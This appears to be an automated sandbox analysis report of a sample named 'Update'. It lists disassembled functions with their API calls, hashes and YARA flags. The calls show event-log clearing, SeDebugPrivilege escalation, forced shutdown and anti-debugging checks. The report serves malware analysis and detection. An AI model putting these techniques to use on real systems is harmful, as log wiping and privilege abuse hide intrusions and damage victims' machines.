                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                            • String ID: PX;lE
                                                                                            • API String ID: 415426439-390628446
                                                                                            • Opcode ID: cfa93b955f925c99f382994d670c95aa5689b2aa0b284bf30681fd3ed76cb994
                                                                                            • Instruction ID: ba2b0f9acd3798432ccfdea2b433c8c004b4fe8144b2e4e1a272c5686a47860a
                                                                                            • Opcode Fuzzy Hash: cfa93b955f925c99f382994d670c95aa5689b2aa0b284bf30681fd3ed76cb994
                                                                                            • Instruction Fuzzy Hash: A6515F71A01209ABEF00DFE8CC44AEE77B8EF15709F104529E960E7590E771DA66CF61
                                                                                            Function 6C376520 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 127encryptionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C376570
                                                                                            • CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C37660E
                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C37666D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: BinaryCryptString$___std_exception_copy
                                                                                            • String ID: Failed to calculate base64 decoded size.$P~7l$n7l
                                                                                            • API String ID: 2515837927-3823540466
                                                                                            • Opcode ID: 0c237b8e977e10cba9e66d7dbde2be2ec555aa4b827b1bb4cb1c0570398fb51b
                                                                                            • Instruction ID: dbcccb4f9cb8886f0476a8e81b417ba6b5987521e7176c1b74c2eb17cc18a13e
                                                                                            • Opcode Fuzzy Hash: 0c237b8e977e10cba9e66d7dbde2be2ec555aa4b827b1bb4cb1c0570398fb51b
                                                                                            • Instruction Fuzzy Hash: 8F417CB1901309ABEB20CF94CC45BDEBBB8EB04714F144529E945ABB80D779A548CFA6
                                                                                            Function 034EB3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenEventLogW.ADVAPI32(00000000,035058BC), ref: 034EB3E7
                                                                                            • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 034EB3F2
                                                                                            • CloseEventLog.ADVAPI32(00000000), ref: 034EB3F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$ClearCloseOpen
                                                                                            • String ID: Application$Security$System
                                                                                            • API String ID: 1391105993-2169399579
                                                                                            • Opcode ID: 834c58abd297628a15f768a96e47b74b36b986f3c618e87ab5344f6df86d10bf
                                                                                            • Instruction ID: 10f717362c9b6cd57b92fa20c152e9aeb185d564f1b7916f2f44555b0053a07f
                                                                                            • Opcode Fuzzy Hash: 834c58abd297628a15f768a96e47b74b36b986f3c618e87ab5344f6df86d10bf
                                                                                            • Instruction Fuzzy Hash: 13E0E5327093144BD211DF06A889B1EF3D0FFC930AF14091EE94856264C631880A9F9A
                                                                                            Function 000215D0 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000215DC
                                                                                            • memset.VCRUNTIME140(?,00000000,00000003), ref: 00021602
                                                                                            • memset.VCRUNTIME140(?,00000000,00000050), ref: 0002168C
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 000216A8
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000216C8
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 000216D2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 1045392073-0
                                                                                            • Opcode ID: 24da01e82335f6cb0f53cbb2cd5ee48e3e6859f725f2684b693de5798fa9c413
                                                                                            • Instruction ID: 9ba151cbeeb163b64d2e0a72e581da700ff0c4ea53d8f9c087bc990fdc0a7949
                                                                                            • Opcode Fuzzy Hash: 24da01e82335f6cb0f53cbb2cd5ee48e3e6859f725f2684b693de5798fa9c413
                                                                                            • Instruction Fuzzy Hash: 15311875D0522CDBDB21DFA4D989BCCBBF8AF18304F1041EAE409AB251EB759A85CF44
                                                                                            Function 0304660F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: swprintf$_memset
                                                                                            • String ID: :$@
                                                                                            • API String ID: 1292703666-1367939426
                                                                                            • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                            • Instruction ID: 30b8622f30d614624d8792eb35ff1f375b5b520d9b9cd8c53b60c65094a1e0db
                                                                                            • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                                            • Instruction Fuzzy Hash: E53161B6D0121CABDB14DFE5CC85FEEB7B9FB88300F50421DE90AAB241E6746A45CB54
                                                                                            Function 6C3A68D3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,6C3A62A4,00000002,00000000,?,?,?,6C3A62A4,?,00000000), ref: 6C3A696C
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,20001004,6C3A62A4,00000002,00000000,?,?,?,6C3A62A4,?,00000000), ref: 6C3A6995
                                                                                            • GetACP.KERNEL32(?,?,6C3A62A4,?,00000000), ref: 6C3A69AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 2299586839-711371036
                                                                                            • Opcode ID: 8ddfd99c1edd516f5cd2d22025282832291ef0a0f13e63fa44823072b9c7e278
                                                                                            • Instruction ID: dd94c8aee8c4bd7fb35d6a80bc4ef55b15b68e2a39950b1983f617f7029f8483
                                                                                            • Opcode Fuzzy Hash: 8ddfd99c1edd516f5cd2d22025282832291ef0a0f13e63fa44823072b9c7e278
                                                                                            • Instruction Fuzzy Hash: 0421B372704101A6D7148FADC901A87B3BAEF41F5CB56852CE919D7904E733DE62CFA8
                                                                                            Function 034E7740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,034E78FC), ref: 034E7756
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,034E78FC,?,?,?,?,?,?,74DF0630), ref: 034E775D
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 034E7785
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 034E77B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                            • String ID: SeDebugPrivilege
                                                                                            • API String ID: 2349140579-2896544425
                                                                                            • Opcode ID: 39385549c5b268e9d4d76833de73e6b95165c4b1e50c21520b28fedc233d85af
                                                                                            • Instruction ID: 25625ab02e219796009583ce745ab15e54b38524fbb302fec2e926f388f11c10
                                                                                            • Opcode Fuzzy Hash: 39385549c5b268e9d4d76833de73e6b95165c4b1e50c21520b28fedc233d85af
                                                                                            • Instruction Fuzzy Hash: 6711A570A40308ABDF00DFE5D959FAEB7B4EB08705F108559E905AB2D0DA75A509CB50
                                                                                            Function 009167EC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00917914
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00917929
                                                                                            • UnhandledExceptionFilter.KERNEL32(10015350), ref: 00917934
                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00917950
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00917957
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 2579439406-0
                                                                                            • Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                                            • Instruction ID: 1a4cb92dfd04904e9877209a5a348e654a95fc8bcf89b9d7d7906708dca4ca89
                                                                                            • Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                                            • Instruction Fuzzy Hash: AA21DFB4914228EFF702DF69C9C96997BF5BB0A315F40D01AE5098B261EBB5D9C0CF81
                                                                                            Function 034EF00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 034F131C
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 034F1331
                                                                                            • UnhandledExceptionFilter.KERNEL32(035025B8), ref: 034F133C
                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 034F1358
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 034F135F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 2579439406-0
                                                                                            • Opcode ID: 1765539d54697d7d7ecdcae64382369e193a25cc2b0dd88bd6a9ca7602b1920d
                                                                                            • Instruction ID: 30f1b34cc9c0f3de4b620bb0962dcc1187c4f359408c5ae46ee74ebee0984166
                                                                                            • Opcode Fuzzy Hash: 1765539d54697d7d7ecdcae64382369e193a25cc2b0dd88bd6a9ca7602b1920d
                                                                                            • Instruction Fuzzy Hash: 472107B8449305DFC760FF68F14AE483BA4BB0830CF10041AE908873B9DB72958AEF55
                                                                                            Function 6C3958B0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
                                                                                            • Instruction ID: 52f360d0e18fcd35b308732043e3dff20b1c5423475d7219511c24100cfed7cb
                                                                                            • Opcode Fuzzy Hash: 73040311bb29c5914551622f8c1703dce3cbee9cddaee4a5e747c8be854a9458
                                                                                            • Instruction Fuzzy Hash: 6B025C71E012199FDB14CFA9D88069EFBB1FF48319F24826AD519E7740E731AA41CF90
                                                                                            Function 6C39F888 Relevance: 6.2, APIs: 4, Instructions: 205COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C39F978
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: 10324c9e82156273941819187f13adcb7fe0c51535d7bbc4f9251135d4250002
                                                                                            • Instruction ID: a61759eaa54b70cb38707303e76aacb594ce9ad1fba2e44a08eb0c0a6f230df0
                                                                                            • Opcode Fuzzy Hash: 10324c9e82156273941819187f13adcb7fe0c51535d7bbc4f9251135d4250002
                                                                                            • Instruction Fuzzy Hash: DF71C471D091596FDF109F28CC88AEEBBB8AF09308F2442D9F059A7650FB324E858F55
                                                                                            Function 6C38C85A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 6C38C866
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6C38C932
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C38C94B
                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6C38C955
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                            • String ID:
                                                                                            • API String ID: 254469556-0
                                                                                            • Opcode ID: 55a5cb39c37dfdc15d5694e9b1540481bdd71df25ba884e2f8be00c43f16f0fb
                                                                                            • Instruction ID: cd13d3328903735e15510ce62489b4859ee93c5a3fd50f8d89ea66face201063
                                                                                            • Opcode Fuzzy Hash: 55a5cb39c37dfdc15d5694e9b1540481bdd71df25ba884e2f8be00c43f16f0fb
                                                                                            • Instruction Fuzzy Hash: D631F875D022189BDF20EF64D9497CDBBB8AF08304F1041EAE40DAB250EB719A858F45
                                                                                            Function 6C393AAF Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C393BA7
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C393BB1
                                                                                            • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 6C393BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: dc9abf3ae4693d943f0382b3443334011885ecc87345172afef4f7cecb1742fb
                                                                                            • Instruction ID: f56ba4ccf4f7bb470d075c6db53529371bf041161d08e0cbf54716cbb7a95fd1
                                                                                            • Opcode Fuzzy Hash: dc9abf3ae4693d943f0382b3443334011885ecc87345172afef4f7cecb1742fb
                                                                                            • Instruction Fuzzy Hash: 0C31C7B590121C9BCB61DF24D8887DDBBF8BF08314F5046EAE41CA7650EB709B858F45
                                                                                            Function 030400CD Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: l$ntdl
                                                                                            • API String ID: 0-924918826
                                                                                            • Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                                            • Instruction ID: 4a30b1414cc511c95662ed000d80d742aa823a5d7d37d050ec49f2d59bb53551
                                                                                            • Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                                            • Instruction Fuzzy Hash: 0821C3B5A016209FCF29EF18949872FBBE6EF85710B1581A9D605AF354EB34CA01C7D1
                                                                                            Function 034EB463 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034E7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
                                                                                              • Part of subcall function 034E7B70: OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
                                                                                              • Part of subcall function 034E7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
                                                                                              • Part of subcall function 034E7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
                                                                                              • Part of subcall function 034E7B70: GetLastError.KERNEL32 ref: 034E7BD2
                                                                                              • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BE0
                                                                                            • ExitWindowsEx.USER32(00000005,00000000), ref: 034EB471
                                                                                              • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID:
                                                                                            • API String ID: 681424410-0
                                                                                            • Opcode ID: 5ab4182ef3e2b54f49704a016581ca1a715ea0a2041fd7376db1f0c864f07955
                                                                                            • Instruction ID: d4673389378756fd25a333f11a24724291ca003dca64e8dd348c693c0960d007
                                                                                            • Opcode Fuzzy Hash: 5ab4182ef3e2b54f49704a016581ca1a715ea0a2041fd7376db1f0c864f07955
                                                                                            • Instruction Fuzzy Hash: 45C08C367802000ED214B3B67826FAAB740DF84337F00062FE70A8C0C00C53849501AA
                                                                                            Function 034EB41B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034E7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
                                                                                              • Part of subcall function 034E7B70: OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
                                                                                              • Part of subcall function 034E7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
                                                                                              • Part of subcall function 034E7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
                                                                                              • Part of subcall function 034E7B70: GetLastError.KERNEL32 ref: 034E7BD2
                                                                                              • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BE0
                                                                                            • ExitWindowsEx.USER32(00000004,00000000), ref: 034EB429
                                                                                              • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID:
                                                                                            • API String ID: 681424410-0
                                                                                            • Opcode ID: d66a7baddf58ba13681d651982df91a50127ab6f6384ce13c250b636048e88bd
                                                                                            • Instruction ID: a636c2bf35b8af7e5925b5ddd7f614e738845a2eb11d52768170557271e2893d
                                                                                            • Opcode Fuzzy Hash: d66a7baddf58ba13681d651982df91a50127ab6f6384ce13c250b636048e88bd
                                                                                            • Instruction Fuzzy Hash: 13C04C367802041ED214B7B67826FA9B740DF94737F50466FE70A9C0D04C67949551AE
                                                                                            Function 034EB43F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034E7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
                                                                                              • Part of subcall function 034E7B70: OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
                                                                                              • Part of subcall function 034E7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
                                                                                              • Part of subcall function 034E7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
                                                                                              • Part of subcall function 034E7B70: GetLastError.KERNEL32 ref: 034E7BD2
                                                                                              • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BE0
                                                                                            • ExitWindowsEx.USER32(00000006,00000000), ref: 034EB44D
                                                                                              • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID:
                                                                                            • API String ID: 681424410-0
                                                                                            • Opcode ID: 36e52c52275269d618803105ac0de62cb0e064d44e01ab078eceb5114f6c60dd
                                                                                            • Instruction ID: 19440cc9b7cb847451d0c3f6f06df645f89c4995624b620e689b845bc873c5b6
                                                                                            • Opcode Fuzzy Hash: 36e52c52275269d618803105ac0de62cb0e064d44e01ab078eceb5114f6c60dd
                                                                                            • Instruction Fuzzy Hash: 7DC04C367802041ED214B7B67826FAAB741DF94737F50466FE60A9C0D04C5794A551AA
                                                                                            Function 00021764 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00001770,000210D3), ref: 00021769
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmpDownload File
